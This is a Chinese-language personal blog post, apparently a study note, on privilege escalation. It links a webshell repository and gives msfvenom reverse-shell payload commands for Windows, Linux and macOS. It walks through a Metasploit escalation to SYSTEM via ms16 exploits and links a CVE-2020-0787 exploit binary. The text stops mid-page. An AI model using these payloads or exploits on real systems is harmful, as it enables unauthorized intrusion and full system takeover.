<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="keywords" content="Hexo Theme Redefine">
    
    <meta name="author" content="yuBetter">
    <!-- preconnect -->
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link rel="preconnect" href="https://evan.beee.top" crossorigin>
    
    <!--- Seo Part-->
    
    <link rel="canonical" href="https://example.com/2023/04/14/权限提升/"/>
    <meta name="robots" content="index,follow">
    <meta name="googlebot" content="index,follow">
    <meta name="revisit-after" content="1 days">
    
        <meta name="description" content="https:&#x2F;&#x2F;github.com&#x2F;tennc&#x2F;webshell后门webshell    网站权限后台漏洞进入网站管理后台之后，在后台中寻找有没有上传功能，或者看看有没有其他漏洞，如sql注入等等，可以查看该套程序是由什么源码开发的，在网上下载源码并对其进行源码代码审计 具体有哪些权限需要我们知道和了解掌握的？ 用途：相关操作被拒绝就涉及到权限提升 后台权限，网站权限，数据库权限，接口权限，系">
<meta property="og:type" content="article">
<meta property="og:title" content="权限提升">
<meta property="og:url" content="https://example.com/2023/04/14/%E6%9D%83%E9%99%90%E6%8F%90%E5%8D%87/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="https:&#x2F;&#x2F;github.com&#x2F;tennc&#x2F;webshell后门webshell    网站权限后台漏洞进入网站管理后台之后，在后台中寻找有没有上传功能，或者看看有没有其他漏洞，如sql注入等等，可以查看该套程序是由什么源码开发的，在网上下载源码并对其进行源码代码审计 具体有哪些权限需要我们知道和了解掌握的？ 用途：相关操作被拒绝就涉及到权限提升 后台权限，网站权限，数据库权限，接口权限，系">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221015190834074.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221015193913576.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221016143650952.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221016144604042.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221016145158480.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221017121848451.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221018174814902.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221018174847309.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221018174912291.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221017122327951.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221017142136381.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221017122610291.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221017122738843.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221017122903172.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221017123006035.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221017123037807.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221017123354205.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221017123320100.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/v2-2f435ace5a53dc2527c8b785f2762317_720w.webp">
<meta property="og:image" content="https://pic3.zhimg.com/80/v2-cd88f291e18f8b34c86408e40605b54a_720w.webp">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221017132716124.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221017132731974.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221017133007487.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221017133335639.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221017133804981.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221017133817690.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221017220412136.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221017220602189.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221017222136312.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221018141950023.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221018142017899.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221018143352551.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221018143511965.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221018143628365.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221018143802006.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221018143900873.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221018154438279.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221018154122467.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221018154647705.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221018154146481.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221018154808146.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221018155228658.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221018155731871.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221019133531100.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221019133947495.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221019135019394.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221019135525686.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221019135507395.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221019140951226.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221019141011052.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221020164246540.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221020211128892.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221020211348556.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221020211438585.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221020212013343.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221021135233606.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221021140258406.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221021140358055.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221021140440660.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221021142533920.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221021152523741.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221021152116172.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221021154236469.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221022190138371.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221022190542244.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221022191955669.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221022192137982.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221022195904933.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221022194323506.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221022200754775.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221022200638234.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221022201035132.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221022201212416.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221022201254320.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221022201600033.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221022202857938.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221022203820926.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221022204141443.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221022204216654.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221022204555115.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221022205245255.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221022205448204.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221022205536430.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221022205702744.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221022210118051.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221022210143398.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221022210236441.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221022210355497.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221022210501903.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221022210837819.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221022210959042.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221022211113039.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221022211342944.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221022211520869.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221022211842805.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221022212012161.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221022212514715.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221022212609301.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221022212727952.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221022212746567.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221022212927461.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221024162713543.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221024162933036.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221024162333961.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221024163227059.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221024165155471.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221024210529479.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221027213507541.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221027221254785.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221027221305324.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221027222303044.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221027223034688.png">
<meta property="og:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221027223233692.png">
<meta property="article:published_time" content="2023-04-14T13:33:42.000Z">
<meta property="article:modified_time" content="2023-04-14T13:34:45.076Z">
<meta property="article:author" content="John Doe">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221015190834074.png">
    
    <!--- Icon Part-->
    <link rel="icon" type="image/png" href="/images/yubetter.svg" sizes="192x192">
    <link rel="apple-touch-icon" sizes="180x180" href="/images/yubetter.svg">
    <meta name="theme-color" content="#A31F34">
    <link rel="shortcut icon" href="/images/yubetter.svg">
    <!--- Page Info-->
    
    <title>
        
            权限提升 -
        
        Yu&#39;s Blog
    </title>
    
<link rel="stylesheet" href="/css/style.css">

    
<link rel="stylesheet" href="/assets/fonts.css">

    <!--- Font Part-->
    
    
    
    

    <!--- Inject Part-->
    
    <script id="hexo-configurations">
    let Global = window.Global || {};
    Global.hexo_config = {"hostname":"example.com","root":"/","language":"en","path":"search.xml"};
    Global.theme_config = {"articles":{"style":{"font_size":"16px","line_height":1.5,"image_border_radius":"14px","image_alignment":"center"},"word_count":{"enable":true,"count":true,"min2read":true},"author_label":{"enable":true,"auto":false,"list":[""]},"code_block":{"copy":true,"style":"mac","font":{"enable":false,"family":null,"url":null}},"toc":{"enable":true,"max_depth":3,"number":false,"expand":true,"init_open":true},"copyright":true,"lazyload":true,"recommendation":{"enable":false,"title":"推荐阅读","limit":3,"placeholder":"/images/wallhaven-wqery6-light.webp","skip_dirs":[]}},"colors":{"primary":"#A31F34","secondary":null},"global":{"fonts":{"chinese":{"enable":false,"family":null,"url":null},"english":{"enable":false,"family":null,"url":null}},"content_max_width":"1000px","sidebar_width":"210px","hover":{"shadow":true,"scale":true},"scroll_progress":{"bar":false,"percentage":true},"busuanzi_counter":{"enable":true,"site_pv":true,"site_uv":true,"post_pv":true},"pjax":true,"open_graph":true},"home_banner":{"enable":true,"image":{"light":"/images/wallhaven-wqery6-light.webp","dark":"/images/wallhaven-wqery6-dark.webp"},"title":"好好学习，天天向上","subtitle":{"text":["有远大志向而脚踏实地，有障碍失败而不言放弃","静以修生，俭以养德，非淡泊无以明志，非宁静无以致远","即使慢，驰而不息，纵会落后，纵会失败，但一定可以达到他所向的目标","穷且益坚，不坠青云之志","莫不有始，鲜克有终","靡不有初,鲜克有终"],"typing_speed":100,"backing_speed":80,"starting_delay":500,"backing_delay":1500,"loop":true,"smart_backspace":true},"text_color":{"light":"#fff","dark":"#d1d1b6"},"text_style":{"title_size":"2.8rem","subtitle_size":"1.5rem","line_height":1.2},"custom_font":{"enable":false,"family":null,"url":null},"social_links":{"enable":false,"links":{"github":null,"instagram":null,"zhihu":null,"twitter":null,"email":null}}},"plugins":{"feed":{"enable":false},"aplayer":{"enable":false,"type":"fixed","audios":[{"name":null,"artist":null,"url":null,"cover":null}]},"mermaid":{"enable":false,"version":"9.3.0"}},"version":"2.1.1","navbar":{"auto_hide":false,"color":{"left":"#f78736","right":"#367df7","transparency":35},"links":{"Home":{"path":"/","icon":"fa-regular fa-house"}},"search":{"enable":false,"preload":true}},"page_templates":{"friends_column":2,"tags_style":"blur"},"home":{"sidebar":{"enable":true,"position":"left","announcement":null,"links":null},"article_date_format":"auto","categories":{"enable":true,"limit":3},"tags":{"enable":true,"limit":3}}};
    Global.language_ago = {"second":"%s seconds ago","minute":"%s minutes ago","hour":"%s hours ago","day":"%s days ago","week":"%s weeks ago","month":"%s months ago","year":"%s years ago"};
  </script>
    
    <!--- Fontawesome Part-->
    
<link rel="stylesheet" href="/fontawesome/fontawesome.min.css">

    
<link rel="stylesheet" href="/fontawesome/brands.min.css">

    
<link rel="stylesheet" href="/fontawesome/solid.min.css">

    
<link rel="stylesheet" href="/fontawesome/regular.min.css">

    
    
    
    
<meta name="generator" content="Hexo 6.3.0"></head>


<body>
<div class="progress-bar-container">
    

    
        <span class="pjax-progress-bar"></span>
        <span class="pjax-progress-icon">
            <i class="fa-solid fa-circle-notch fa-spin"></i>
        </span>
    
</div>


<main class="page-container">

    

    <div class="main-content-container">

        <div class="main-content-header">
            <header class="navbar-container">
    
    <div class="navbar-content">
        <div class="left">
            
            <a class="logo-title" href="/">
                
                Yu&#39;s Blog
                
            </a>
        </div>

        <div class="right">
            <!-- PC -->
            <div class="desktop">
                <ul class="navbar-list">
                    
                        
                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class="" 
                                    href="/"  >
                                    
                                        
                                            <i class="fa-regular fa-house"></i>
                                        
                                        HOME
                                    
                                </a>
                                <!-- Submenu -->
                                
                            </li>
                    
                    
                </ul>
            </div>
            <!-- Mobile -->
            <div class="mobile">
                
                <div class="icon-item navbar-bar">
                    <div class="navbar-bar-middle"></div>
                </div>
            </div>
        </div>
    </div>

    <!-- Mobile drawer -->
    <div class="navbar-drawer">
        <ul class="drawer-navbar-list">
            
                
                    <li class="drawer-navbar-item flex-center">
                        <a class="" 
                        href="/"  >
                             
                                
                                    <i class="fa-regular fa-house"></i>
                                
                                HOME
                            
                        </a>
                    </li>
                    <!-- Submenu -->
                    
            

        </ul>
    </div>

    <div class="window-mask"></div>

</header>


        </div>

        <div class="main-content-body">

            

            <div class="main-content">

                
                    <div class="fade-in-down-animation">
    <div class="post-page-container">
        <div class="article-content-container">

            
             
                <div class="article-title">         
                    <img src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/QQ%E5%9B%BE%E7%89%8720210505145504.jpg" alt="权限提升" />
                    <h1 class="article-title-cover">权限提升</h1>
                </div>
            
                
            

            
                <div class="article-header">
                    <div class="avatar">
                        <img src="/images/yubetter-logon.svg">
                    </div>
                    <div class="info">
                        <div class="author">
                            <span class="name">yuBetter</span>
                            
                                <span class="author-label"></span>
                            
                        </div>
                        <div class="meta-info">
                            <div class="article-meta-info">
    <span class="article-date article-meta-item">
        <i class="fa-regular fa-pen-fancy"></i>&nbsp;
        <span class="desktop">2023-04-14 21:33:42</span>
        <span class="mobile">2023-04-14 21:33</span>
        <span class="hover-info">Created</span>
    </span>
    
        <span class="article-date article-meta-item">
            <i class="fa-regular fa-wrench"></i>&nbsp;
            <span class="desktop">2023-04-14 21:34:45</span>
            <span class="mobile">2023-04-14 21:34</span>
            <span class="hover-info">Updated</span>
        </span>
    

    
    

    
    
        <span class="article-wordcount article-meta-item">
            <i class="fa-regular fa-typewriter"></i>&nbsp;<span>4.8k Words</span>
        </span>
    
    
        <span class="article-min2read article-meta-item">
            <i class="fa-regular fa-clock"></i>&nbsp;<span>17 Mins</span>
        </span>
    
    
</div>

                        </div>
                    </div>
                </div>
            

            <div class="article-content markdown-body">
                <p><a class="link"   target="_blank" rel="noopener" href="https://github.com/tennc/webshell%E5%90%8E%E9%97%A8webshell" >https://github.com/tennc/webshell后门webshell <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a></p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221015190834074.png"
                      alt="image-20221015190834074"
                ></p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221015193913576.png"
                      alt="image-20221015193913576"
                ></p>
<h2 id="网站权限后台漏洞"><a href="#网站权限后台漏洞" class="headerlink" title="网站权限后台漏洞"></a>网站权限后台漏洞</h2><p>进入网站管理后台之后，在后台中寻找有没有上传功能，或者看看有没有其他漏洞，如sql注入等等，可以查看该套程序是由什么源码开发的，在网上下载源码并对其进行源码代码审计</p>
<p>具体有哪些权限需要我们知道和了解掌握的？</p>
<p>用途：相关操作被拒绝就涉及到权限提升</p>
<h5 id="后台权限，网站权限，数据库权限，接口权限，系统权限，域控权限等"><a href="#后台权限，网站权限，数据库权限，接口权限，系统权限，域控权限等" class="headerlink" title="后台权限，网站权限，数据库权限，接口权限，系统权限，域控权限等"></a>后台权限，网站权限，数据库权限，接口权限，系统权限，域控权限等</h5><h6 id="后台权限：（获得方式：爆破、注入猜解、弱口令等获取账号密码登入）"><a href="#后台权限：（获得方式：爆破、注入猜解、弱口令等获取账号密码登入）" class="headerlink" title="后台权限：（获得方式：爆破、注入猜解、弱口令等获取账号密码登入）"></a>后台权限：（获得方式：爆破、注入猜解、弱口令等获取账号密码登入）</h6><p>一般网站或者后台只能操作应用界面的内容数据图片信息等，无法操作程序的源代码或者服务器上的资源文件的。（如果后台存在文件操作功能的话也可以操作文件数据）</p>
<h6 id="网站权限：（获得方式：以上三种思路获取）"><a href="#网站权限：（获得方式：以上三种思路获取）" class="headerlink" title="网站权限：（获得方式：以上三种思路获取）"></a>网站权限：（获得方式：以上三种思路获取）</h6><p>查看或者修改程序源代码，可以进行网站或应用的配置文件读取（接口配置信息，数据库配置信息等），还能收集服务器操作系统相关的信息，为后续系统提权做准备</p>
<h6 id="数据库权限："><a href="#数据库权限：" class="headerlink" title="数据库权限："></a>数据库权限：</h6><p>操作数据库的权限，数据库的增删改查等，源码或配置文件泄露，也可能是网站权限（webshell）进行是数据库配置文件读取获得。</p>
<h6 id="接口权限：（邮件、短信，支付，第三方登录等）"><a href="#接口权限：（邮件、短信，支付，第三方登录等）" class="headerlink" title="接口权限：（邮件、短信，支付，第三方登录等）"></a>接口权限：（邮件、短信，支付，第三方登录等）</h6><p>后台或者网站权限的获取途径：后台（修改配置信息功能点），网站权限（查看配置文件获取）。</p>
<h2 id="win溢出漏洞及AT-amp-SC-amp-PS提权"><a href="#win溢出漏洞及AT-amp-SC-amp-PS提权" class="headerlink" title="win溢出漏洞及AT&amp;SC&amp;PS提权"></a>win溢出漏洞及AT&amp;SC&amp;PS提权</h2><p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221016143650952.png"
                      alt="image-20221016143650952"
                ></p>
<h4 id="windows提权命令"><a href="#windows提权命令" class="headerlink" title="windows提权命令"></a>windows提权命令</h4><p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221016144604042.png"
                      alt="image-20221016144604042"
                ></p>
<h6 id="用户及用户组的权限也需要了解"><a href="#用户及用户组的权限也需要了解" class="headerlink" title="用户及用户组的权限也需要了解"></a>用户及用户组的权限也需要了解</h6><p>默认情况下，系统位用户分配了7个组，并给每个组赋予了不同的操作权限，管理员组、高权限用户组、普通用户组、备份操作组、文件复制组、来宾用户组、身份验证用户组</p>
<p>其中备份操作组和文件复制组为维护系统而设置，平时不会用到</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221016145158480.png"
                      alt="image-20221016145158480"
                ></p>
<h5 id="提权实例之溢出漏洞提权—基于web环境的权限提升"><a href="#提权实例之溢出漏洞提权—基于web环境的权限提升" class="headerlink" title="提权实例之溢出漏洞提权—基于web环境的权限提升"></a>提权实例之溢出漏洞提权—基于web环境的权限提升</h5><p>如何判断使用哪种溢出漏洞？漏洞该在哪里找？</p>
<p>信息收集—补丁筛选—利用MSF或特定EXP–执行—权限到手</p>
<h5 id="payload生成"><a href="#payload生成" class="headerlink" title="payload生成"></a>payload生成</h5><h6 id="windows"><a href="#windows" class="headerlink" title="windows"></a>windows</h6><p>msfvenom -p windows&#x2F;meterpreter&#x2F;reverse_tcp LHOST&#x3D;<Your IP Address> LPORT&#x3D;<Your Port to Connect On> -f exe &gt; shell.exe</p>
<h6 id="Linux"><a href="#Linux" class="headerlink" title="Linux"></a>Linux</h6><p>msfvenom -p linux&#x2F;x86&#x2F;meterpreter&#x2F;reverse_tcp LHOST&#x3D;<Your IP Address> LPORT&#x3D;<Your Port to Connect On> -f elf &gt; shell.elf</p>
<h6 id="MAC"><a href="#MAC" class="headerlink" title="MAC"></a>MAC</h6><p>msfvenom -p osx&#x2F;x86&#x2F;shell_reverse_tcp LHOST&#x3D;<Your IP Address>LPORT&#x3D;<Your Port to Connect On> -f macho &gt; shell.macho</p>
<p>先使用msf生成一个5577.exe的payload文件，当被攻击主机访问该文件时，将会被链接</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221017121848451.png"
                      alt="image-20221017121848451"
                ></p>
<p>服务器使用msf的set lport 5577  来监听5577端口 </p>
<p>设置一个监听端口和你的主机IP地址以及payload</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221018174814902.png"
                      alt="image-20221018174814902"
                ></p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221018174847309.png"
                      alt="image-20221018174847309"
                ></p>
<p>run执行，反弹成功</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221018174912291.png"
                      alt="image-20221018174912291"
                ></p>
<p>可以看到，被攻击主机信息可以有效反弹到服务器，但是getuid发现现在是普通用户权限（web权限），接下来就要进行提权操作</p>
<p>使用search ms16命令，查找出现有的exp</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221017122327951.png"
                      alt="image-20221017122327951"
                ></p>
<p>使用exp</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221017142136381.png"
                      alt="image-20221017142136381"
                ></p>
<p>寻找出刚才会话的session发现为3</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221017122610291.png"
                      alt="image-20221017122610291"
                ></p>
<p>设置session为3，然后设置payload，再查看设置选项（show options）<img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221017122738843.png"
                      alt="image-20221017122738843"
                ></p>
<p>得到结果，查看端口</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221017122903172.png"
                      alt="image-20221017122903172"
                ></p>
<p>设置IP地址（服务器端的IP地址）</p>
<p> <img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221017123006035.png"
                      alt="image-20221017123006035"
                ></p>
<p>设置一个新的端口来接收，system权限</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221017123037807.png"
                      alt="image-20221017123037807"
                ></p>
<p>执行exploit，发现成功建立第四个会话</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221017123354205.png"
                      alt="image-20221017123354205"
                ></p>
<p>执行getuid</p>
<p>发现成功获得system权限，最高权限,提权结束</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221017123320100.png"
                      alt="image-20221017123320100"
                ></p>
<p>（注意：如果你所使用的服务器有安全组功能的话，必须到服务器安全组管理界面，设置端口及IP地址的白名单，不然监听的端口信息反弹不到服务器）</p>
<h5 id="基于本地环境的权限提升–系统溢出漏洞"><a href="#基于本地环境的权限提升–系统溢出漏洞" class="headerlink" title="基于本地环境的权限提升–系统溢出漏洞"></a>基于本地环境的权限提升–系统溢出漏洞</h5><p>exp链接</p>
<div class="highlight-container" data-rel="Text"><figure class="iseeu highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">https://github.com/cbwang505/CVE-2020-0787-EXP-ALL-WINDOWS-VERSION/releases/download/1/BitsArbitraryFileMoveExploit.exe</span><br></pre></td></tr></table></figure></div>

<p>将生成&#x2F;下载的EXP程序复制到受漏洞影响的版本的测试靶机上，打开cmd，直接拖动exp到cmd窗口中运行exp，如下图所示：</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/v2-2f435ace5a53dc2527c8b785f2762317_720w.webp"
                      alt="img"
                ></p>
<p>可以看到exp运行完成后立即弹出一个新的system权限的cmd窗口，如下图所示：</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://pic3.zhimg.com/80/v2-cd88f291e18f8b34c86408e40605b54a_720w.webp"
                      alt="img"
